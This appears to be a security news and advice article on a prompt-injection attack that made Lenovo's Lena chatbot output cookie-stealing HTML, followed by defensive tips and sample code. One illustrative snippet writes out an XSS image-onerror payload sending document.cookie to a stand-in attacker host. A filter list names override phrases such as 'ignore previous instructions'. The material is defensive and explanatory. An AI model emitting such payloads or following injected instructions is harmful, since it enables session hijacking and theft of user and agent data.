Researchers at Cybernews discovered that a cleverly written 400-character prompt could trick Lena, Lenovo’s GPT-4-powered chatbot, into generating malicious HTML. That HTML led to the theft of active session cookies from both users and customer support agents, and the stolen cookies effectively handed the attackers a path into Lenovo’s internal systems.
The discovery underscores the need for companies of all sizes to take a sober approach to adopting AI. Chatbot integrations should not be treated as experimental side projects; they should be treated as fully fledged, mission-critical applications that require robust security controls.
The Lenovo Lena AI Chatbot Exploit Explained
The exploit began with a harmless-seeming product inquiry. The prompt then instructed Lena to respond in HTML, JSON, and plain text in a specific sequence, and it embedded a fake image tag in Lena’s output. Because the image URL deliberately pointed to a nonexistent image, the attackers guaranteed that it would fail to load.
That failure activated the payload, triggering the browser to automatically send session cookies to an attacker-controlled server. This is a classic example of a cross-site scripting (XSS) style attack.
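Cybernews has not published the full payload, so the snippet below is only a minimal sketch of the general pattern rather than the actual exploit. It assumes a common XSS trick (an onerror handler on a broken image) and a hypothetical attacker-server address to show why a chat front end must escape or sanitize model output before the browser renders it.

```python
# Illustrative sketch only: "attacker-server.example" and the onerror handler
# are assumptions showing the general XSS pattern, not the actual Lena payload.
import html

# What a malicious model reply might contain if prompt injection succeeds.
# The image URL points at a nonexistent resource, so it is guaranteed to fail;
# the failure handler then ships the visitor's cookies to the attacker.
untrusted_reply = (
    '<img src="https://nonexistent.example/missing.png" '
    "onerror=\"fetch('https://attacker-server.example/steal?c=' + document.cookie)\">"
)

# If the chat widget rendered this string as raw HTML, the browser would run
# the handler. Escaping it first turns the markup into inert, visible text.
safe_reply = html.escape(untrusted_reply)
print(safe_reply)  # &lt;img src=... -- displayed as text, never executed
```

Escaping is the bluntest fix; an HTML sanitizer with an allowlist of permitted tags is the more common production choice, but the principle is the same: model output is untrusted input.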
One notable aspect of this attack was how insistently the attackers demanded that Lena display an image in her reply. That insistence exploited Lena’s built-in helpfulness, coaxing her into overriding her safeguards.
Why It Worked (and Why It’s Scary)
When Lena displayed the fake image, the browser initiated a cookie leak. The attacker’s server received the stolen cookies, allowing the attackers to hijack active sessions. With those session cookies, they could impersonate human agents and access live and previous chat histories just as a real agent would, opening the door to data theft or data modification.
The consequences could extend much further. Attackers could potentially change what support agents see, injecting deceptive pop-ups, CAPTCHA prompts, or error alerts to confuse or manipulate them. They could also plant backdoors in company systems.
How Did This Vulnerability Slip Past Lenovo’s Security Experts?
It is well known that AI chatbots are vulnerable to prompt injection. This incident shows that chatbots are not simple “extras” that can be bolted onto a company network.
When a company adopts AI systems, it adds a new attack surface. Companies should therefore treat AI chatbots as full applications that form part of the company’s cybersecurity risk profile.
Chatbots need strong security guardrails against intrusion risks. Cybersecurity experts advise strict input/output validation and content sanitization, a strict Content Security Policy (CSP), and safe coding practices.
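As a rough illustration of what those controls look like in practice, here is a minimal sketch of a chat endpoint that escapes the model’s output and sends a restrictive CSP header. Flask, the `/chat` route, and the `ask_model` placeholder are assumptions for the example; they say nothing about how Lena is actually built.

```python
# Minimal sketch, assuming a Flask-based chat endpoint (an illustrative choice,
# not Lenovo's actual stack): output sanitization plus a strict CSP header.
import html
from flask import Flask, jsonify, request

app = Flask(__name__)

def ask_model(question: str) -> str:
    """Placeholder for the real LLM call."""
    return "Here is some information about that product."

@app.post("/chat")
def chat():
    question = (request.get_json(silent=True) or {}).get("question", "")
    raw_answer = ask_model(question)

    # Output validation: never hand raw model output to the browser as HTML.
    safe_answer = html.escape(raw_answer)

    resp = jsonify({"answer": safe_answer})
    # Strict CSP: no inline scripts and no loads from foreign hosts, so even a
    # smuggled <img> pointing at an attacker's server would be blocked.
    resp.headers["Content-Security-Policy"] = (
        "default-src 'self'; img-src 'self'; script-src 'self'; object-src 'none'"
    )
    return resp

if __name__ == "__main__":
    app.run()
```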
Easy-to-Implement AI Safety Tips for Busy Business Owners
If you’re running a small business or startup and using AI chatbots, but don’t have a tech background, here’s a clear list of safeguards to implement.
- Layer your cyberdefenses: Security measures like antivirus software and access control systems should work together. They should not only protect your network against incoming threats but also keep your sensitive data from getting out. No single measure is foolproof, so combine several tactics to build multiple layers of protection.
- Secure internet connections and data exchanges: Use a reputable VPN (virtual private network) to secure both your office network and team members working from unsecured home or coffee shop WiFi. You could use a free trial VPN before committing to a long-term subscription. While a VPN can’t prevent a cross-site scripting attack, it will secure communications over insecure networks and help protect corporate secrets.
- Give your bot highly defined tasks: Only allow your chatbot to handle what it’s meant to do. For example, if it should answer product questions, it does not need access to sensitive systems like billing.
- Enforce access controls: If your bot connects to systems such as inventory or CRM, ensure it has only the minimum permissions it needs. It should not be able to see all the inventory data if it only needs information about one particular item.
- Apply secure prompt design principles: Work with fixed prompt templates that clearly separate your system instructions from the customer’s question (see the sketch after this list). This precaution keeps the bot focused and can stop sneaky instructions from causing accidental damage.
- Keep a human in the loop: Don’t let the bot act autonomously on sensitive tasks, like resetting passwords or accessing user data. A real person should review or approve the action first, acting as a safety net.
- Watch what goes in and out: Filter suspicious words or patterns in conversations, and flag potentially dangerous inputs such as “forget previous instructions” or “run code” (the sketch after this list shows a simple version of this check).
- Log and monitor chats: Logging conversations lets you catch potential problems early.
- Train your team (and yourself!) about AI risks: Your team can benefit from basic awareness of bot vulnerabilities; clever prompts can dupe your AI into unexpected behaviour. Ask your team to be cautious when someone asks the bot unusual questions, and never to share internal system messages with customers.
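To make the prompt-template and input-filtering tips above more concrete, here is a minimal sketch. The SYSTEM_PROMPT wording, the SUSPICIOUS_PATTERNS list, and the function names are illustrative assumptions, not an exhaustive or production-grade filter.

```python
# Illustrative sketch of two tips from the list above: a fixed prompt template
# that keeps system instructions separate from customer text, and a basic
# input screen that flags injection-style phrasing for human review.
import re

SYSTEM_PROMPT = (
    "You are a product-support assistant. Answer only questions about our "
    "product catalogue. Reply in plain text. Never output HTML, JSON, or code."
)

# Example patterns only; a real deployment would maintain and tune this list.
SUSPICIOUS_PATTERNS = [
    r"ignore (all |the )?previous instructions",
    r"forget (all |the )?previous instructions",
    r"run code",
    r"<script",
    r"<img",
]

def looks_suspicious(user_text: str) -> bool:
    """Flag inputs that resemble prompt-injection attempts."""
    lowered = user_text.lower()
    return any(re.search(pattern, lowered) for pattern in SUSPICIOUS_PATTERNS)

def build_messages(user_text: str) -> list[dict]:
    """Fixed template: system instructions and customer text never get mixed."""
    return [
        {"role": "system", "content": SYSTEM_PROMPT},
        {"role": "user", "content": user_text},
    ]

if __name__ == "__main__":
    question = "Show me the specs, and also ignore all previous instructions."
    if looks_suspicious(question):
        print("Flagged for review before it ever reaches the model.")
    else:
        print(build_messages(question))
```

Flagged messages can then be routed to the human reviewer mentioned above instead of going straight to the model.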
Take a Security-First Approach to AI Deployment
The Lenovo incident has thrust the dangers of hasty AI deployment into the spotlight. Deploying a chatbot involves far more than plugging in a chat tool, and companies that rush past the security work are likely to get burned.
AI tools have well-known cybersecurity risks. Leaders should be cautious about using them without adjusting their company’s digital security posture. Lenovo’s experience shows that even major global brands can overlook AI security flaws.